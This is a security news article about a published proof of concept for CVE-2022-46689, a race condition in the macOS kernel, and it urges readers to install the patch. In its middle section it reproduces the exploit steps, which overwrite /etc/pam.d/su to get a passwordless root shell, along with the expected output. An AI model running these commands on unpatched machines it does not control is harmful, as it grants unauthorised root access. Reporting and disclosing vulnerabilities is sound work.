CVE-2022-46689 PoC Exploit Released for macOS Privilege Escalation Vulnerability
A security researcher has published details and proof-of-concept (PoC) code for a macOS vulnerability that could be exploited to get root and execute arbitrary code with kernel privileges.
The PoC exploit targets CVE-2022-46689, a vulnerability that could allow a local authenticated attacker to gain elevated privileges on the system, caused by a race condition in the macOS kernel. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to execute arbitrary code with kernel privileges.
Tracked as CVE-2022-46689 (CVSS score of 8.4), the security defect was identified and reported by Ian Beer of Google Project Zero, with a patch available since the release of macOS Ventura 13.1 in December.
“An app may be able to execute arbitrary code with kernel privileges,” Apple wrote in its advisory. “A race condition was addressed with additional validation.”
Recently, Zhuowei published details on the CVE-2022-46689 PoC code needed to exploit the flaw.
How to get root on macOS 13.0.1 with CVE-2022-46689
On a macOS 13.0.1 / 12.6.1 (or below) machine, run:
git clone https://github.com/zhuowei/MacDirtyCowDemo.git
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e “s/rootok/permit/g” /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
You should get:
Testing for 10 seconds…
RO mapping was modified
% su
sh-3.2#
If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:
Testing for 10 seconds…
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
and running su should still ask for a password.
Some possible consequences of successful exploitation are infection with ransomware, data theft, and backdoor, making it imperative that users apply the updates (macOS 13.1 / 12.6.2 / 11.7.2).
